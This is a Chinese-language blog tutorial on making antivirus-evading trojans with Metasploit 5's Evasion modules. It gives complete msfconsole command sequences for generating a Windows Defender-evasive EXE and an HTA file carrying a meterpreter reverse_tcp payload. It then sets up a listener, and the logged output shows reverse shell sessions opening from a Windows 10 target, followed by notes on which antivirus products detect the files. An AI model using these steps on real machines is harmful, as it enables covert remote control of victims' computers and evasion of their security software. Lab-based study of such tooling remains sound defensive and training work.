MSF Evasion模块免杀

2019年1月metasploit升级到5.0,引入了一个新的模块叫Evasion,这个模块据说可以创建反杀毒软件的木马

进入MSF 查看该模块下几个可以使用的模块

image 16 - MSF Evasion模块免杀
msf6 > show evasion

evasion
=======

   #  Name                                         Disclosure Date  Rank    Check  Description
   -  ----                                         ---------------  ----    -----  -----------
   0  windows/applocker_evasion_install_util                        normal  No     Applocker Evasion - .NET Framework Installation Utility
   1  windows/applocker_evasion_msbuild                             normal  No     Applocker Evasion - MSBuild
   2  windows/applocker_evasion_presentationhost                    normal  No     Applocker Evasion - Windows Presentation Foundation Host
   3  windows/applocker_evasion_regasm_regsvcs                      normal  No     Applocker Evasion - Microsoft .NET Assembly Registration Utility
   4  windows/applocker_evasion_workflow_compiler                   normal  No     Applocker Evasion - Microsoft Workflow Compiler
   5  windows/windows_defender_exe                                  normal  No     Microsoft Windows Defender Evasive Executable
   6  windows/windows_defender_js_hta                               normal  No     Microsoft Windows Defender Evasive JS.Net and HTA

生成exe

进入模块5 windows/windows_defender_exe 使用该模块生成payload

image 17 - MSF Evasion模块免杀
msf6 > use windows/windows_defender_exe  #进入该模块
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp #设置payload为反向侦听
payload => windows/meterpreter/reverse_tcp
msf6 evasion(windows/windows_defender_exe) > set filename zfmy.exe
 #设置生成的木马名称为zfmy.exe
filename => zfmy.exe
msf6 evasion(windows/windows_defender_exe) > set lport 4444 #设置侦听端口为4444
lport => 4444
msf6 evasion(windows/windows_defender_exe) > set lhost 192.168.15.137 #接收shell的ip为本地的ip
lhost => 192.168.15.137
msf6 evasion(windows/windows_defender_exe) > run #执行

[*] Compiled executable size: 3584
[+] zfmy.exe stored at /home/kail/.msf4/local/zfmy.exe #生成的木马存于该路径下
msf6 evasion(windows/windows_defender_exe) > 
image 18 - MSF Evasion模块免杀

将该木马放到目标机win10系统

开始侦听 发现木马可用

image 19 - MSF Evasion模块免杀
msf6 evasion(windows/windows_defender_exe) > handler -H 192.168.15.137 -P 4444 -p windows/meterpreter/reverse_tcp
[*] Payload handler running as background job 0.
msf6 evasion(windows/windows_defender_exe) > 
[*] Started reverse TCP handler on 192.168.15.137:4444 
[*] Sending stage (175174 bytes) to 192.168.15.183
[*] Meterpreter session 1 opened (192.168.15.137:4444 -> 192.168.15.183:63456) at 2022-01-05 13:34:51 +0800
[*] Sending stage (175174 bytes) to 192.168.15.183
[*] Meterpreter session 2 opened (192.168.15.137:4444 -> 192.168.15.183:63596) at 2022-01-05 13:35:07 +0800

得到shell

image 20 - MSF Evasion模块免杀

切换到win10 查看360和火绒的查杀情况 火绒和360能轻松识别

image 21 - MSF Evasion模块免杀

使用另外一个模块 windows/windows_defender_js_hta

image 22 - MSF Evasion模块免杀
msf6 > use windows/windows_defender_js_hta
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 evasion(windows/windows_defender_js_hta) > set filename zfmy1.hta
filename => zfmy1.hta
msf6 evasion(windows/windows_defender_js_hta) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 evasion(windows/windows_defender_js_hta) > set lport 4444
lport => 4444
msf6 evasion(windows/windows_defender_js_hta) > set lhost 192.168.15.137
lhost => 192.168.15.137
msf6 evasion(windows/windows_defender_js_hta) > run

[+] zfmy1.hta stored at /home/kail/.msf4/local/zfmy1.hta
msf6 evasion(windows/windows_defender_js_hta) > 

木马可用

image 23 - MSF Evasion模块免杀
msf6 evasion(windows/windows_defender_js_hta) > run

[+] zfmy1.hta stored at /home/kail/.msf4/local/zfmy1.hta
msf6 evasion(windows/windows_defender_js_hta) > [*] 192.168.15.183 - Meterpreter session 2 closed.  Reason: Died

msf6 evasion(windows/windows_defender_js_hta) > 
msf6 evasion(windows/windows_defender_js_hta) > handler -H 192.168.15.137 -P 4444 -p windows/meterpreter/reverse_tcp
[*] Payload handler running as background job 1.
msf6 evasion(windows/windows_defender_js_hta) > 
[-] Handler failed to bind to 192.168.15.137:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Sending stage (175174 bytes) to 192.168.15.183
[*] Meterpreter session 3 opened (192.168.15.137:4444 -> 192.168.15.183:64230) at 2022-01-05 13:52:05 +0800
[*] 192.168.15.183 - Meterpreter session 3 closed.  Reason: Died

360 和火绒均未报毒

但是点击运行的时候360会进行报毒

image 24 - MSF Evasion模块免杀
image 25 - MSF Evasion模块免杀

其他的模块需要使用工具进行编译 本节暂时略过

msfvenom编码免杀

上一篇

免杀工具veil初探

下一篇
评论
发表评论 说点什么
还没有评论
176